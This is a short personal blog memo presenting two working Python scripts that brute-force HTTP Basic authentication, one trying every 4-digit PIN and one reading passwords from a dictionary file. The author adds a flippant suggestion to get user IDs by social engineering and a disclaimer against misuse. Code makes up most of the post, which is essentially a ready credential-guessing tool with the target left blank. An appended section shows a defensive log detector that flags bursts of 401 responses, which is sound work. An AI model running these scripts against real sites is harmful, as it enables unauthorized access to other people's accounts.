Brute-forcing Basic authentication with Python

More than 3 years have passed since last update.

What I did

  • A brute-force attack against Basic authentication using only 4-digit numbers
  • A brute-force attack against Basic authentication using a dictionary file

Conditions

  • Only the password is being cracked, so the user ID is assumed to be already known
    • If you don't know it, try social engineering or something (lol)

Environment

  • Python 3

Brute-force attack (4-digit number)

import urllib.error
import urllib.request


def attack_basic(url, user_id):
    # Every 4-digit code from 0000 to 9999, zero-padded so that
    # values such as "0042" are tried as well (the original skipped them)
    for n in range(10000):
        password = "%04d" % n
        pass_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
        pass_mgr.add_password(realm=None, uri=url, user=user_id, passwd=password)
        handler = urllib.request.HTTPBasicAuthHandler(pass_mgr)
        # Use the opener directly instead of installing it globally on every loop
        opener = urllib.request.build_opener(handler)
        try:
            opener.open(url)  # a 2xx response means the credentials were accepted
            print("%s is correct!" % password)
            return password
        except urllib.error.HTTPError as err:
            # 401 means rejected; any other status is reported as-is
            print("%s is incorrect (HTTP %d)" % (password, err.code))
    return None


if __name__ == '__main__':
    url = ""
    user_id = ""
    attack_basic(url, user_id)


Brute-force attack (dictionary file)

import urllib.error
import urllib.request


def attack_basic(url, user_id):
    # One candidate password per line; the file path is left for the reader to fill in
    with open("", "r") as f:
        passlist = f.read().splitlines()
    for password in passlist:
        pass_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
        pass_mgr.add_password(realm=None, uri=url, user=user_id, passwd=password)
        handler = urllib.request.HTTPBasicAuthHandler(pass_mgr)
        # Use the opener directly instead of installing it globally on every loop
        opener = urllib.request.build_opener(handler)
        try:
            opener.open(url)  # a 2xx response means the credentials were accepted
            print("%s is correct!" % password)
            return password
        except urllib.error.HTTPError as err:
            # 401 means rejected; any other status is reported as-is
            print("%s is incorrect (HTTP %d)" % (password, err.code))
    return None


if __name__ == '__main__':
    url = ""
    user_id = ""
    attack_basic(url, user_id)

In closing

  • Misuse of either script is strictly forbidden
    • Honestly, even if you tried this, I think the number of web pages it would actually work on is extremely small.
    • Anyone whose password would be exposed by this should change it right away.
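From the server side, either script above shows up as a burst of 401 responses from one client against one protected path. As an added example (not part of the original article), the following detector parses combined-format access log lines and flags clients whose rejected requests to a single path reach a threshold inside a sliding time window; the log lines, addresses (RFC 5737 test ranges) and the /admin/ path are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined-log-format line: client ip, identd, user, [timestamp], "request", status, bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"), "ts": datetime.strptime(m.group("ts"), TS_FMT),
            "path": m.group("path"), "status": int(m.group("status"))}

def find_bruteforce(lines, threshold=20, window=timedelta(minutes=1)):
    """Return {ip: peak} for clients whose 401s against a single path reach
    `threshold` inside any `window`; peak is the largest such count seen."""
    stamps = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 401:
            stamps[(rec["ip"], rec["path"])].append(rec["ts"])
    hits = {}
    for (ip, _path), ts_list in stamps.items():
        ts_list.sort()
        start = 0
        for end, ts in enumerate(ts_list):  # sliding window over the sorted timestamps
            while ts - ts_list[start] > window:
                start += 1
            n = end - start + 1
            if n >= threshold:
                hits[ip] = max(hits.get(ip, 0), n)
    return hits

# Constructed sample: one client makes 30 rejected guesses in 30 seconds;
# a legitimate user mistypes once and then logs in successfully.
_T0 = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)

def _line(ip, offset, status, path="/admin/"):
    ts = (_T0 + timedelta(seconds=offset)).strftime(TS_FMT)
    return '%s - - [%s] "GET %s HTTP/1.1" %d 0' % (ip, ts, path, status)

SAMPLE_LINES = ([_line("203.0.113.7", i, 401) for i in range(30)]
                + [_line("198.51.100.4", 0, 401), _line("198.51.100.4", 5, 200)])

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LINES))  # {'203.0.113.7': 30}
```

A single 401 from a real user never crosses the threshold, while the guessing client is reported with its peak count; in production the same logic would feed a lockout or rate limit rather than a print.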
nekkoneko
I write down things I want to keep, in the style of memo notes.